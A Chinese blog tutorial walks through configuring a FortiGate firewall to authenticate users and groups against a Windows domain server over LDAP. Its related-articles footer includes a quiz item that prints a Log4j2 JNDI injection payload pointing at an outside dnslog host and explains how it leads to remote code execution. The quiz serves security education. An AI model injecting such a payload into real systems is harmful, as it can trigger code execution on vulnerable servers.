​​【认证篇 / 远程】(7.0) ❀ 04. 防火墙与域服务器 LDAP 连接 ❀ FortiGate 防火墙

已于 2022-08-02 09:29:56 修改
阅读量4.8k 收藏 17
点赞数 3
分类专栏: # 远程 文章标签: FortiGate LDAP 域服务器 用户
于 2022-04-27 13:02:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meigang2012/article/details/124429190
版权

  【简介】当一切都准备好后,我们可以开始配置FortiGate防火墙与Windows Server 2022域服务器的连接了。防火墙需要得到域服务器上的用户名和密码,以进行访问验证。

 标识符cn

  域服务器和防火墙都支持LDAP。

  ① 登录FortiGate防火墙,选择菜单【用户与认证】-【LDAP】,点击【新建】。

   ② 输入自定义名称。

   ③ 输入域服务器的IP地址。

   ④ 常用的标识符有三种:cn (常用名)、SAMAccountName (远程登录名)、uid (用户ID)。默认为cn。

  ⑤ 当标识符为cn时,我们需要知道用户的完整名称。在域服务器中打开ADSI编辑器,找到Administrator用户,点击【更多操作】-【属性】。

  ⑥ 找到distinguishedName属性,得到Administrator的完整标识名为CN=Administrator,CN=Users,DC=oldmei,DC=com。复制下来。

  ⑦ 绑定类型选择【常规】,用户名粘贴我们得到的CN=Administrator,CN=Users,DC=oldmei,DC=com,输入管理员密码,点击【测试连接性】,显示连接成功。

   ⑧ 点击【浏览】,用来选择辨别名,这个只有测试连接成功的状态下,才能读取到内容。所以最后再设置。

  ⑨ 弹出窗口显示整个域服务器里的内容,鼠标点击第一行的DC=oldmei,DC=com,然后点击【OK】。

  ⑩ 在辨识名显示我们选择的目录树,由于我们选择的是第一层目录,表示我们可以得到域下的所有内容。点击【测试用户认证信息】。

   ⑾ 输入张三的用户名和密码,测试通过。说明可以读取到张三的用户信息。

  ⑿ 是不是只有管理员帐号才可以呢?我没有管理员帐号怎么办?别急,我们来试试其它帐号。这里我来查看售后部王五的属性。

  ⒀ 得到王五的专有名称,复制下来。

  ⒁ 用户名改成王五的专有名称,输入密码,点击【测试连接性】,一样显示成功。

  ⒂ 测试用户认证信息,不是售后部的张三信息也能读取到,这就证明,配置LDAP,普通用户帐号就可以了,并不一定要管理员帐号。

  标识符sAMAccountName

  标识符sAMAccountName使用的也很多。

  ① 在用户王五的属性里,我们可以看到sAMAccountName内容。

  ② 在Active Directory管理中心查看用户,可以看到SamAccountName登录方式。

  ③ 标识符输入sAMAccountName,用户输入oldmei\wangwu,点击【测试连接性】,连接成功。

  ④ 测试用户信息也能通过,注意用户名格式与标识符cn不同。

  ⑤ 如果使用常规绑定,请输入具有访问LDAP服务器的足够权限的用户名。支持以下格式:

  domain\administrator

  administrator@domain

  cn=administrator,cn=users,dc=domain,dc=com

  标识符uid

  标识符uid用的比较少。

  ① 实验证明,不管标识符是cn、sAMMountAccount或uid,用户名的三种格式都能正常通过。

  远程用户

  既然已经创建了LDAP服务器,那么就可以在防火墙上创建远程用户了。

  ① 选择菜单【用户与认证】-【设置用户】,点击【新建】。

  ② 用户类型选择【远程LDAP用户】,点击【下一步】。

  ③ 选择LDAP服务器,点击【下一步】。

  ④ 找到要加入的用户,点击鼠标左右,弹出菜单选择【添加已选】,可以添加多个用户,点击【确认】。

  ⑤ 远程用户加入防火墙,可以直接在策略中引用了。

  ⑥ 当标识符为uid时,即使用的是管理员帐号。

  ⑦ 远程用户最后一项,因为ID和名称相同,用户无法选择。而标识符为cn和sAMAccountNmae时不会出现这种情况。

  远程用户组

  除了将域服务器单个用户引入防火墙外,还可以将组引入。

  ① 登录FortiGate防火墙,选择菜单【用户与认证】-【用户组】,点击【新建】。

  ② 如果没有创建LDAP连接,新建用户组显示的内容比较少。

  ③ 只有创建了LDAP连接后,新建用户组才会显示远程组选项。输入用户组名称,在远程组点击【添加】。

   ④ 弹出窗口,点击远程服务器选择下拉,选择我们前面建立的LDAP服务器。

   ⑤ 由于我们在LDAP设置时辨识名选择的是dc=oldmei,dc=com,因此会显示所有的用户组。我们可以利用域的默认组,例如Domain Users组会存放所有的域用户,点击鼠标右键,弹出菜单选择【添加已选】。

  ⑥ 点击确认后返回,我们可以在远程组里看到刚才选择的组信息。

   ⑦ 再次点击确认后返回,我们可以在用户组里看到新建的远程验证用户组,只要在策略里引用,就可以进行远程认证了。

  ⑨ 除了在域服务器里建立专用的组之外,也可以直接利用原有组。假如我们只对研发部进行验证。编辑LDAP服务器,点击【浏览】。

  ⑩ 弹出菜单里显示域的整个结构,鼠标点击研发部的组织单位OU=Research,点击后不会有反应,再点击【确认】。

  ⑾ 辨识名内容有所变更,指定了oldmei.com下的research组织单位。那这个会有什么变化呢?

  ⑿ 回到新建组里的组区配,可以到只显示了研发部下面的组,其它组是不会再显示出来的。我们可以选择研发部的组,只对研发部进行身份验证。

飞塔老梅子
关注
  • 3
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
服务器如何设置防火墙?
LuHai3005151872的博客
04-06 2286
服务器如何设置防火墙,下面就由小编详细介绍一下: 网上邻居——属性——本地连接——属性——高级——设置      启用防火墙       启用防火墙        选择例外添加一些常用端口。在例外中添加了一些端口是为了防止设不当导致一些常用端 口被关闭。如服务器远程连接默认端口是3389.您就可以在例外中添加一个3389端口。 开启防火墙后不会因端口被封耐导致无法正常连接服务器。下面列举一些常用端...
Fortigate firewall LDAP config
gotonet的专栏
10-29 1351
Case ScenarioYou have to two groups of users attempting to access the Internet through the FortiGate. Most users need to be restricted in their access to the Internet. A few select users are permitt
基于LDAP与802.1x的无线接入统一身份认证研究
07-04
对基于LDAP统一身份认证架构下的802.1x的无线接入认证整合进行研究。提出并建立了一套保障信息安全的全局身份认证管理系统,在采用RC4安全加密技术的基础上,实现了基于RADIUS的无线802.1x/EAP接入认证和基于LDAP认证服务的整合。实现接入用户认证管理和应用层统一身份认证用户的全局统一管理。
认证 / 远程】(7.0) 05. SSL 拨入由帐户验证 FortiGate 防火墙
防火墙技术专栏
04-28 2332
当我们用LDAP连接服务器后,可以取得服务器内的帐户信息,当我们需要进行验证的时候,远程读取内帐户信息进行验证,最常用的运行环境就是SSL VPN。
数据采集服务器物理接线示意图(含防火墙
weixin_39688581的博客
12-18 2761
含工业防火墙在内的数采服务器连接方式
认证 / 远程】(7.0) 03. 服务器防火墙连接前的准备工作 FortiGate 防火墙
防火墙技术专栏
04-26 1302
当Windows Server 2022服务器安装及配置好后,就可以和FortiGate防火墙进行边接了,但是在连接之前 ,还有一些准备工作要做。
FortiGate认证LDAP
weixin_33849942的博客
10-07 889
前面说了ASA的用户进行认证,那么FortiGate行不行呢,FortiGate从很早的版本(3.0)就可以支持了,现在4.0当然没问题了。 先看图。本例子用的是v4.0,build0458,110627 (MR3 Patch 1)版。 如图打开设置用户远程LDAP,右面的画面就显示出需要填写的内容。 名称是自己定义的,没要求。服务器名称是控的,...
com.sun.jndi.ldap.jar
01-08
总的来说,`com.sun.jndi.ldap.jar`对于需要与LDAP服务器交互的Java应用来说是至关重要的。虽然在Maven中央仓库中可能难以找到,但通过上述方法,开发者依然可以成功地将其集成到自己的项目中,享受其提供的强大功能...
LdapBrowser282.rar_LdapBrows_LdapBrowser.282_ldap_ldapBrowser_op
09-23
4. **安全管理**:LdapBrowser支持连接到使用不同安全级别的服务器,如匿名连接、简单认证、SSL/TLS 加密等。 5. **导入与导出**:可以将目录数据导入或导出为不同的格式,方便数据迁移或备份。 6. **日志记录与调试...
ldap.rar_c++ ldap_用户验证
09-19
6. **关闭连接**:验证完成后,记得释放所有资源并关闭与LDAP服务器连接。使用`ldap_unbind_s()`函数来完成这个任务。 在压缩包文件"ldap"中,可能包含了示例代码或库文件,帮助你更好地理解和实现这个过程。在...
什么是LDAP连接工具?如何利用好它.docx
05-29
**LDAP 连接工具详解与应用** LDAP(Lightweight Directory Access Protocol)是一种网络协议,用于在互联网上查询和管理分布式目录服务。它提供了一种高效、简洁的方式,使得用户能够检索和更新存储在目录服务器中...
【高级 / DNS】(7.0) 03. FortiGate作为Window DNS的备用DNS服务器 FortiGate 防火墙
防火墙技术专栏
05-13 2962
在公司总部,有建立Windows DNS服务器,可以通过名解析出内网地址来。分公司通过VPN连接总公司,能不能也利用公司总部的DNS服务器来解析内网地址呢?如果可以实现,那么所有分公司都可以利用名通过VPN来访问总部服务器了。我们可以将FortiGate防火墙作为备用DNS服务器来实现这个功能。...
【Freeradius】使用Freeradius、LDAP和Google Authenticator实现双因素身份验证
最新发布
u012153104的博客
10-08 1797
随着网络安全威胁的增加,传统的用户名和密码已经变得不再安全。为了加强网络访问的安全性,双因素身份验证成为了一种流行且有效的解决方案。在本文中,我们将介绍如何在已有的Windows AD环境下,在Ubuntu 22.04上安装和配置Freeradius和Google Authenticator来实现双因素身份验证,来提供网络访问服务器认证、授权和帐户信息。
(FortiGate飞塔防火墙使用LDAP和FSSO代理进行单点登录
weixin_34239592的博客
02-02 1455
案例中使用FSSO和Windows DC LDAP服务器认证进行用户身份的校验来控制网络访问的权限。1. 在FortiGate防火墙上配置Windows DC LDAP服务器找到User & Device > LDAP Servers配置具体的LDAP内容2. 在Windows DC服务器上安装FSSO的代理软件按照软件安装的向导一步步操作安装输入Window...
飞塔FG V4.0 LDAP ×××配置
weixin_33774615的博客
09-11 393
实验环境: 防火墙FG200B,系统为V4.0,build0313,110301 (MR2 Patch 4) 活动目录DC,系统为Windows Server 2008 R2 <!--[if !supportLists]-->1、 <!--[endif]-->依次展开设置用户远程LDAP并新建 <!--[if !suppor...
(FortiGate飞塔防火墙配置AD***
weixin_33935777的博客
02-05 1247
在这个案例中,我们将深入了解FortiOS 5.4版本中引入的一个新的×××功能:AD×××AD×××(自动发现×××)是基于IETF RFC草案的IPsec技术,具体可以参考以下链接https://tools.ietf.org/html/draft-sathyanarayan-ipsecme-ad***-03 简单来说,AD×××允许传统的Hub和Spoke ×××彼此之间...
关于FortigateLDAP整合出现LDAP-5错误的解决方法 -飞塔防火墙
网络工程师专栏
05-09 1229
如上图如所示,在Fortigate 设定与公司内部LDAP整合后会出现Ldap-5错误 导致无法与LDAP对接成功 解决方法: 1.将Fortigate remoteauthtimeout 时间调整到30s(默认为5s),需要命令来调整,如下: # config system global set remoteauthtimeout >seconds<(30) end 2.将LDAP认证用户名和密码只需要用DC的用户即可,不需要用到管理员的帐号和密码 如上即可看到F...
#Fortigate#LDAP 如何设置同步LDAP用户作为系统登录控制台的管理员账号
jiuyou91的博客
11-07 2082
#Fortigate#LDAP 如何设置同步LDAP用户作为系统登录控制台的管理员账号
教程(7.2) 04. 防火墙身份验证 & FortiGate安全 Fortinet网络安全专家 NSE4
防火墙技术专栏
02-14 2037
在本节课中,你将学习如何在FortiGate防火墙策略上使用身份验证。
12.下列Payload中那个是Apache Log4j2远程代码执行漏洞?( 1.5分) A. ${gjnid:ldap://9ao.dnslog.cn} B.${ldap;jndi://9ao.dnslog.cn}C. ${jndi:ldap://9ao.dnslog.cn}D. ${jndi:ladp://9ao.dnslog.cn}
06-13
正确答案是 C. ${jndi:ldap://9ao.dnslog.cn}。Apache Log4j2 是流行的 Java 日志框架之一,近期被曝出远程代码执行漏洞。攻击者可以构造恶意 JNDI 数据源名称,触发 Log4j2 使用 JNDI 进行数据源查找,从而在目标服务器上执行任意代码。在构造恶意数据源名称时,可以使用类似 ${jndi:ldap://9ao.dnslog.cn} 的 Payload,其中 ldap://9ao.dnslog.cn 是攻击者控制的 LDAP 服务器地址,攻击者可以在该地址上获取目标服务器发送的数据,以实现远程攻击。而其他选项中,${gjnid:ldap://9ao.dnslog.cn}、${ldap;jndi://9ao.dnslog.cn}、${jndi:ladp://9ao.dnslog.cn} 都不是有效的 Payload,可能是一些错误的拼写或者语法错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

飞塔老梅子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值